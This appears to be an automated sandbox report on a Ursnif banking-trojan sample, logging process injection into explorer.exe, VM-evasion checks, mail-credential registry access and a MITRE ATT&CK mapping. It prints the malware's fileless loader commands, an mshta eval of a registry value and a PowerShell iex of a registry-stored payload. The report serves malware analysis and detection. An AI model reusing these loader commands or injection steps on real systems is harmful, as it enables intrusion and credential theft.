Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Source: C:\Windows\System32\control.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5156
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3564

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\yacmzdf3\yacmzdf3.dll			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mu1rnx1a\mu1rnx1a.dll			Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5520

Thread sleep time: -9223372036854770s >= -30000s

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_02773512 Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,	2_2_02773512
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_05415518 wcscpy,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,	2_2_05415518
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_05404CF1 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,	2_2_05404CF1
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_0540B88D lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,	2_2_0540B88D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_0540834C RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,	2_2_0540834C

Source: C:\Windows\SysWOW64\regsvr32.exe

2_2_054016E1

Source: explorer.exe, 00000024.00000002.616609988.0000000003710000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000024.00000000.413817757.000000000374F000.00000004.00000001.sdmp	Binary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000024.00000000.413817757.000000000374F000.00000004.00000001.sdmp	Binary or memory string: AASCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000024.00000000.411669645.00000000011B3000.00000004.00000020.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
Source: explorer.exe, 00000024.00000000.430548360.00000000089B5000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
Source: explorer.exe, 00000024.00000002.622481126.00000000053D7000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
Source: explorer.exe, 00000024.00000000.430548360.00000000089B5000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002

Source: C:\Windows\SysWOW64\regsvr32.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_0542556E LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,

2_2_0542556E

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_05401F12 ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,

2_2_05401F12

HIPS / PFW / Operating System Protection Evasion:

Changes memory attributes in foreign processes to executable or writable

Show sources

Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFA9B851580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFA9B851580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFA9B851580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFA9B851580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFA9B851580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write

Compiles code for process injection (via .Net compiler)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File written: C:\Users\user\AppData\Local\Temp\yacmzdf3\yacmzdf3.0.cs

Jump to dropped file

Creates a thread in another existing process (thread injection)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread created: C:\Windows\explorer.exe EIP: 9B851580
Source: C:\Windows\explorer.exe	Thread created: unknown EIP: 9B851580
Source: C:\Windows\explorer.exe	Thread created: unknown EIP: 9B851580
Source: C:\Windows\explorer.exe	Thread created: unknown EIP: 9B851580
Source: C:\Windows\explorer.exe	Thread created: unknown EIP: 9B851580
Source: C:\Windows\explorer.exe	Thread created: unknown EIP: 9B851580

Injects code into the Windows Explorer (explorer.exe)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3472 base: EB0000 value: 00
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3472 base: 7FFA9B851580 value: EB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3472 base: 3020000 value: 80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3472 base: 7FFA9B851580 value: 40

Maps a DLL or memory area into another process

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Program Files\internet explorer\iexplore.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: unknown protection: execute and read and write

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread register set: target process: 3472
Source: C:\Windows\explorer.exe	Thread register set: target process: 4016
Source: C:\Windows\explorer.exe	Thread register set: target process: 4288
Source: C:\Windows\explorer.exe	Thread register set: target process: 4448
Source: C:\Windows\explorer.exe	Thread register set: target process: 5936
Source: C:\Windows\explorer.exe	Thread register set: target process: 6488
Source: C:\Windows\explorer.exe	Thread register set: target process: 2092

Writes to foreign memory regions

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: C:\Windows\System32\control.exe base: 7FF6678212E0	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: C:\Windows\System32\control.exe base: 7FF6678212E0	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: EB0000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 7FFA9B851580
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 3020000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 7FFA9B851580

Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\mu1rnx1a\mu1rnx1a.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\yacmzdf3\yacmzdf3.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES78AB.tmp' 'c:\Users\user\AppData\Local\Temp\mu1rnx1a\CSC6647FE8FE542539CE2919E5B6D2D1D.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES8CA0.tmp' 'c:\Users\user\AppData\Local\Temp\yacmzdf3\CSCE6DA2C7C1B814D8F891E10CFF0A5BBCE.TMP'
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h

Source: unknown

Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'

Source: explorer.exe, 00000024.00000002.611247225.0000000001640000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000024.00000002.611247225.0000000001640000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000024.00000002.611247225.0000000001640000.00000002.00000001.sdmp	Binary or memory string: SProgram Managerl
Source: explorer.exe, 00000024.00000000.411588453.0000000001128000.00000004.00000020.sdmp	Binary or memory string: ProgmanOMEa
Source: explorer.exe, 00000024.00000002.611247225.0000000001640000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd,
Source: explorer.exe, 00000024.00000002.611247225.0000000001640000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_0277A12A cpuid

2_2_0277A12A

Source: C:\Windows\SysWOW64\regsvr32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_05405F90 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError,

2_2_05405F90

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_027712E8 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,

2_2_027712E8

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_0277A12A wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

2_2_0277A12A

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_0277A667 GetVersionExA,wsprintfA,

2_2_0277A667

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000002.00000003.395542546.00000000042F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328188279.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.401552845.000001BFEB270000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328320558.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328226726.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328337032.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328359150.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328350143.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328266588.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328300905.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.336044765.0000000004DBB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 6448, type: MEMORY

Tries to steal Mail credentials (via file access)

Show sources

Source: C:\Windows\explorer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Windows\explorer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Remote Access Functionality:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000002.00000003.395542546.00000000042F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328188279.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.401552845.000001BFEB270000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328320558.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328226726.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328337032.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328359150.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328350143.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328266588.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328300905.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.336044765.0000000004DBB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 6448, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts1	Windows Management Instrumentation2	DLL Side-Loading1	DLL Side-Loading1	Obfuscated Files or Information2	Credential API Hooking3	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer3	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API1	Valid Accounts1	Valid Accounts1	Software Packing2	LSASS Memory	Account Discovery1	Remote Desktop Protocol	Email Collection11	Exfiltration Over Bluetooth	Encrypted Channel12	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Command and Scripting Interpreter12	Logon Script (Windows)	Access Token Manipulation1	DLL Side-Loading1	Security Account Manager	File and Directory Discovery3	SMB/Windows Admin Shares	Credential API Hooking3	Automated Exfiltration	Non-Application Layer Protocol4	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	PowerShell1	Logon Script (Mac)	Process Injection713	Rootkit4	NTDS	System Information Discovery35	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol5	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Masquerading1	LSA Secrets	Query Registry1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Valid Accounts1	Cached Domain Credentials	Security Software Discovery11	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Access Token Manipulation1	DCSync	Virtualization/Sandbox Evasion3	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Virtualization/Sandbox Evasion3	Proc Filesystem	Process Discovery3	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Process Injection713	/etc/passwd and /etc/shadow	Application Window Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Regsvr321	Network Sniffing	System Owner/User Discovery1	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	Rundll321	Input Capture	Permission Groups Discovery	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop

Behavior Graph

Hide Legend

